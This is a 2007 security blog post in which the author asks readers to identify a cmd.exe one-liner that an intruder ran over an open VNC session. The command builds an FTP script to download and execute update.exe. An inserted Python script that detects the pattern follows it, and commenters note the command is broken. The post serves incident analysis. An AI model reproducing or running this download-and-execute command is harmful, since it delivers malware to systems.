The Lazy Genius

Security News & Brain Dumps from Xavier Ashe, a Bit9 Client Partner

Anyone seen this?

Posted by Xavier Ashe on June 5, 2007

I've got a bastion host that had VNC wide open. I just got a connection. It fired a ctrl-alt-del, opened a task manager, and ran cmd.exe. It then executed the following command. I was able to get a screen shot before the window disappeared, but it looked like the command was not successful. The attacker disconnected immediately. I have no extra users, but am downloading Helix right now to see if anything really happened. I also have a pcap. But does this look familiar to anyone?

cmd /c net set 21 >> ij &echo user ingenieurisiv aiisiv >> ij &echo binary >> ij &echo get update.exe >> ij &echo bye >> ij &ftp -n -v -s:ij &del ij &update.exe &net start SharedAccess &exit
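One way to triage a captured cmd.exe one-liner for the FTP-script download-and-execute pattern shown above, as an added example (not code from the post). The sample command lines are constructed here: the one quoted in the post, plus a benign one for contrast. The checker also reports whether the script ever contained an "open <host>" line, which is what the comments below point out is missing.

```python
import re

# Constructed samples: the command line captured in the post, and a benign one.
CAPTURED = ("cmd /c net set 21 >> ij &echo user ingenieurisiv aiisiv >> ij "
            "&echo binary >> ij &echo get update.exe >> ij &echo bye >> ij "
            "&ftp -n -v -s:ij &del ij &update.exe &net start SharedAccess &exit")
BENIGN = "cmd /c dir C:\\logs & echo done"

FTP_SCRIPT = re.compile(r"\bftp\b.*\s-s:(\S+)", re.IGNORECASE)   # ftp driven by a script file
REDIRECT = re.compile(r">>?\s*(\S+)\s*$")                        # "... >> file" at end of a part
GET_CMD = re.compile(r"^echo\s+get\s+(\S+)", re.IGNORECASE)      # script line fetching a file
OPEN_CMD = re.compile(r"^echo\s+open\s+\S+", re.IGNORECASE)      # script line naming the server

def split_cmd(cmdline):
    """Strip a leading 'cmd /c' and split the one-liner on &, && and || separators."""
    body = re.sub(r"^\s*cmd(\.exe)?\s+/[ck]\s+", "", cmdline, flags=re.IGNORECASE)
    return [p.strip() for p in re.split(r"&&|\|\||&", body) if p.strip()]

def analyze(cmdline):
    """Describe the script-built FTP fetch-and-run pattern, or return None if absent."""
    parts = split_cmd(cmdline)
    script = None
    for p in parts:
        m = FTP_SCRIPT.search(p)
        if m:
            script = m.group(1)
    if script is None:
        return None
    writes = []                       # parts that append to the ftp script file
    for p in parts:
        r = REDIRECT.search(p)
        if r and r.group(1) == script:
            writes.append(p)
    fetched = [GET_CMD.match(p).group(1) for p in writes if GET_CMD.match(p)]
    # A fetched file name appearing as its own command means it was executed.
    executed = [p for p in parts if any(p.lower().startswith(f.lower()) for f in fetched)]
    deleted = any(re.match(rf"del\s+{re.escape(script)}$", p, re.IGNORECASE) for p in parts)
    return {"script": script, "lines_written": len(writes), "fetched": fetched,
            "executed": executed, "script_deleted": deleted,
            "has_open": any(OPEN_CMD.match(p) for p in writes)}

if __name__ == "__main__":
    for line in (CAPTURED, BENIGN):
        print(analyze(line))
```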

Responses to “Anyone seen this?”

  1. Anonymous said

    Are you sure the first part is correct? “net set 21 >> ij” does not make any sense, I would expect him to specify the ftp host there.


  2. Anonymous said

    Yeah… we have a screen shot of the attack. It looks like a buggy bot to me. NET SET is not a valid command on XP, and I don't think it's a valid command on any OS.


  3. Anonymous said

    Hi –
    I had something similar happen:
    http://adminspotting.net/blog/one-day-while-using-vnc.html
